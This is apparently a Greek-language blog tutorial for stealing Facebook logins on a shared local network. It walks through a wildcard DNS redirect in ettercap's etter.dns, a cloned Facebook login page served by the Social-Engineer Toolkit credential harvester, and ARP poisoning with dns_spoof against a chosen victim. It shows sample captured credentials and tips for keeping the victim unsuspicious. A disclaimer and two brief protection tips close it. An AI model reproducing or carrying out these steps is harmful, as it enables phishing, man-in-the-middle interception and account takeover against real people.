Αυτος ο οδηγος θα σας εκπαιδευσει να κλεβετε κωδικους του Facebook μονο ομως στο τοπικο δικτυο σας δεν ευθυνομαι για κακοβουλη χρηση κοινοποιω αυτο τον οδηγο μονο και μονο για να καταλαβετε πως δουλευει
Τι θα χρειαστειτε;
1.Backtrack 5 R1
-ανοιγουμε ενα τερματικο και γραφουμε cd /usr/share/ettercap
-μετα γραφουμε nano etter.dns εκει που λεει microsoft sucks redirect to linux κτλ ακριβως απο κατω γραφουμε *.facebook.* A 192.168.1.64 δλδ την ip μας (αν δεν ξερεις ποια ειναι ανοιξε ενα τερματικο και γραψε ifconfig και εκει που λεει wlan0 θα δεις inet addr:192.168.1.64) θα ειναι δλδ καπως ετσι ################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
*.facebook.* A 192.168.1.64
microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56 # Wildcards in PTR are not allowed
-παταμε ctrl+x παταμε y μετα enter αποθηκευουμε
-παταμε alt+F4 για να κλεισει το τερματικο
-μετα παμε Applications-Backtrack-services-HTTPD-apache stop
-μετα παμε Applicatios-Backtrack-Social engineer tools-Social enginer toolkit-set
-παταμε 1 enter Social-Engineering Attacks
-2 enter Website Attack Vectors
-3 enter Credential Harvester Attack Method
-1 enter Web Templates και επιλεγουμε το 4 enter - facebook * μπορουμε να επιλεξουμε το 2 και να γραψουμε την δικια μας σελιδα που θελουμε να κλωνοποιησουμε πχ www.zoo.gr αλλα στο etter.dns πρεπει να αλλαξουμε σε *zoo.gr Α ''ip μας''
και μας εμφανιζει αυτο
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
-μετα ανοιγουμε το ettercap το οποιο θα το βρουμε Applications-internet-ettercap.(αν δεν υπαρχει εκει δειτε τους αλλους οδηγους μου πως να το εγκαταστησετε)παταμε shift+U επιλεγουμε wlan0 μετα ctrl+s ,μετα H και επιλεγουμε traget 1 το ρουτερ μας και target 2 το θυμα μας,μετα παμε mitm -arp poisoning -sniff remote connections και παταμε οκ,μετα παταμε ctrl+w επειτα παταμε ctr+p και επιλεγουμε dns_spoof με διπλο κλικ[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
-τωρα για να δουμε αν δουλευει η κλωνοποιημενη σελιδα μας παμε στο browser μας(firefox) και γραφουμε την ip μας πχ εμενα 192.168.1.64 αν δουμε οτι η σελιδα δεν ειναι καλη οπως πρεπει το ξανακανουμε απο την αρχη ετσι ωστε να μην κοινησουμε υποψια στην θυμα μας μερικες φορες συμβαινει αυτο
-τωρα το θυμα μας ανοιγει τον browser του και και γραφει facebook παει στην σελιδα την δικια μας (χωρις να παρει χαμπαρι) παταει email και κωδικο και μας ερχονται τα αποτελεσματα οπως παρακατω
[*] WE GOT A HIT! Printing the output:
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: locale=en_US
POSSIBLE USERNAME FIELD FOUND: non_com_login=
POSSIBLE USERNAME FIELD FOUND: email=Nickthesailor@fetamail.com
POSSIBLE PASSWORD FIELD FOUND: pass=Nicktesailor
POSSIBLE PASSWORD FIELD FOUND: pass_placeholder=
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: lsd=Bi_FQ
[*] WHEN YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
-ΠΡΟΣΟΧΗ μετα παταμε crl+c για να σταματησουμε το SET και stop mitm attacks στo ettercap αλλιως ο χρηστης θα υποψιαστει
Πως να προστατευτειτε?
1.Στις ρυθμισεις ασφαλειας στο facebook εχει μια επιλογη που λεει ασφαλη περιηγηση την ενεργοποιειτε επισεις πανω πανω αριστερα καθε φορα που συνδεεστε στο facebook λεει https://www.facebook.com και οχι www.facebook.com
2.Η επιθεση γινεται απο κοινο ρουτερ οποτε καποιος θα ειναι κοντα στην εμβελια σας προσπαθηστε να εχετε wpa/wpa2 ασφαλεια στο ρουτερ ετσι να μην συνδεετε κανενας στο ρουτερ σας
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου